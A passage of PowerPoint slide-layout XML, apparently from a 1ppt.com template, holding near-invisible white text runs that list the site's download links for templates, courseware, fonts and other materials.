              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout148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48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48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48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4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49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49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49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49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49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49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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout149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49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49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49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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout15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50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50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50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50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50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50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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
